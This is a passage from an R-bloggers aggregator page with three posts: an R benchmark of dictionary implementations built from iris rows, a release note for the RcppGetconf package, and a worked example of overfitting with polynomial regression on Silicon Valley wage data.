### LIST() FUNCTION IN BASE PACKAGE ### x1 <- as.list(iris[1, ]) names(x1) # [1] "Sepal.Length" "Sepal.Width" "Petal.Length" "Petal.Width" "Species" x1[["Sepal.Length"]] # [1] 5.1 ### ENVIRONMENT-BASED SOLUTION ### envn_dict <- function(x) { e <- new.env(hash = TRUE) for (name in names(x)) assign(name, x[, name], e) return(e) } x2 <- envn_dict(iris[1, ]) ls(x2) # [1] "Petal.Length" "Petal.Width" "Sepal.Length" "Sepal.Width" "Species" x2[["Sepal.Length"]] # [1] 5.1 ### COLLECTIONS PACKAGE ### coll_dict <- function(x) { d <- collections::Dict$new() for (name in names(x)) d$set(name, x[, name]) return(d) } x3 <- coll_dict(iris[1, ]) x3$keys() # [1] "Petal.Length" "Petal.Width" "Sepal.Length" "Sepal.Width" "Species" x3$get("Sepal.Length") # [1] 5.1 ### HASH PACKAGE ### hash_dict <- function(x) { d <- hash::hash() for (name in names(x)) d[[name]] <- x[, name] return(d) } x4 <- hash_dict(iris[1, ]) hash::keys(x4) # [1] "Petal.Length" "Petal.Width" "Sepal.Length" "Sepal.Width" "Species" hash::values(x4, "Sepal.Length") # Sepal.Length # 5.1 ### DATASTRUCTURES PACKAGE ### data_dict <- function(x) { d <- datastructures::hashmap() for (name in names(x)) d[name] <- x[, name] return(d) } x5 <- data_dict(iris[1, ]) datastructures::keys(x5) # [1] "Species" "Sepal.Width" "Petal.Length" "Sepal.Length" "Petal.Width" datastructures::get(x5, "Sepal.Length") # [1] 5.1 ### FROM PYTHON ### py2r_dict <- function(x) { return(reticulate::py_dict(names(x), x, TRUE)) } x6 <- py2r_dict(iris[1, ]) x6$keys() # [1] "Petal.Length" "Sepal.Length" "Petal.Width" "Sepal.Width" "Species" x6["Sepal.Length"] # [1] 5.1 ### CONVERT DATAFRAME TO DICTIONARY LIST ### to_list <- function(df, fn) { l <- list() for (i in seq(nrow(df))) l[[i]] <- fn(df[i, ]) return(l) } rbenchmark::benchmark(replications = 100, order = "elapsed", relative = "elapsed", columns = c("test", "replications", "elapsed", "relative", "user.self", "sys.self"), "BASE::LIST" = to_list(iris, as.list), "BASE::ENVIRONMENT" = to_list(iris, envn_dict), "COLLECTIONS::DICT" = to_list(iris, coll_dict), "HASH::HASH" = to_list(iris, hash_dict), "DATASTRUCTURES::HASHMAP" = to_list(iris, data_dict), "RETICULATE::PY_DICT" = to_list(iris, py2r_dict) ) # test replications elapsed relative user.self sys.self #1 BASE::LIST 100 0.857 1.000 0.857 0.000 #2 BASE::ENVIRONMENT 100 1.607 1.875 1.607 0.000 #4 HASH::HASH 100 2.600 3.034 2.600 0.000 #3 COLLECTIONS::DICT 100 2.956 3.449 2.956 0.000 #5 DATASTRUCTURES::HASHMAP 100 16.070 18.751 16.071 0.000 #6 RETICULATE::PY_DICT 100 18.030 21.039 18.023 0.008 var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: S+/R – Yet Another Blog in Statistical Computing. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

RcppGetconf 0.0.3

Sat, 11/17/2018 - 01:23

(This article was first published on Thinking inside the box , and kindly contributed to R-bloggers)

A second and minor update for the RcppGetconf package for reading system configuration — not unlike getconf from the libc library — is now on CRAN.

Changes are minor. We avoid an error on a long-dead operating system cherished in one particular corner of the CRAN world. In doing so some files were updated so that dynamically loaded routines are now registered too.

The short list of changes in this release follows:

Changes in inline version 0.0.3 (2018-11-16)
  • Examples no longer run on Solaris where they appear to fail.

Courtesy of CRANberries, there is a diffstat report. More about the package is at the local RcppGetconf page and the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: Thinking inside the box . R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Example of Overfitting

Sat, 11/17/2018 - 00:31

(This article was first published on Mad (Data) Scientist, and kindly contributed to R-bloggers)

I occasionally see queries on various social media as to overfitting — what is it?, etc. I’ll post an example here. (I mentioned it at my talk the other night on our novel approach to missing values, but had a bug in the code. Here is the correct account.)

The dataset is prgeng, on wages of programmers and engineers in Silicon Valley as of the 2000 Census. It’s included in our polyreg package, which we developed as an alternative to neural networks. But it is quite useful in its own right, as  it makes it very convenient to fit multivariate polynomial models. (Not as easy as it sounds; e.g. one must avoid cross products of orthogonal dummy variables, powers of those variables, etc.)

First I split the data into training and test sets:

 

> set.seed(88888) > getPE() > pe1 <- pe[,c(1,2,4,6,7,12:16,3)] > testidxs <- sample(1:nrow(pe1),1000) > testset <- pe1[testidxs,] > trainset <- pe1[-testidxs,]

As a base, I fit an ordinary degree-1 model and found the mean absolute prediction error:

> lmout <- lm(wageinc ~ .,data=trainset) > predvals <- predict(lmout,testset[,-11]) > mean(abs(predvals - testset[,11])) [1] 25456.98

Next, I tried a quadratic model:

> pfout <- polyFit(trainset,deg=2) > mean(abs(predict(pfout,testset[,-11]) - testset[,11])) [1] 24249.83

Note that, though originally there were 10 predictors, now with polynomial terms we have 46.

I kept going:

deg MAPE # terms 3 23951.69 118 4 23974.76 226 5 24340.85 371 6 24554.34 551 7 36463.61 767 8 74296.09 1019

One must keep in mind the effect of sampling variation, and repeated trials would be useful here, but it seems that the data can stand at least a cubic fit and possibly as much as degree 5 or even 6. To be conservative, it would seem wise to stop at degree 3. That’s also consistent with the old Tukey rule of thumb that we should have p <- sqrt(n), n being about 20,000 here.

In any event, the effects of overfitting here are dramatic, starting at degree 7.

It should be noted that I made no attempt to clean the data, nor to truncate predicted values at 0, etc.

It should also be noted that, starting at degree 4, R emitted warnings, “prediction from a rank-deficient fit may be misleading.” It is well known that at high degrees, polynomial terms can have multicollinearity issues.

Indeed, this is a major point we make in our arXiv paper cited above. There we argue that neural networks are polynomial models in disguise, with the effective degree of the polynomial increasing a lot at each successive layer, and thus multicollinearity increasing from layer to layer. We’ve confirmed this empirically. We surmise that this is a major cause of convergence problems in NNs.

Finally, whenever I talk about polynomials and NNs, I hear the standard (and correct) concern that polynomial grow rapidly at the edges of the data. True, but I would point out that if you accept NNs = polynomials, then the same is true for NNs.

We’re still working on the polynomials/NNs project. More developments to be announced soon. But for those who are wondering about overfitting, the data here should make the point.

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: Mad (Data) Scientist. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Pages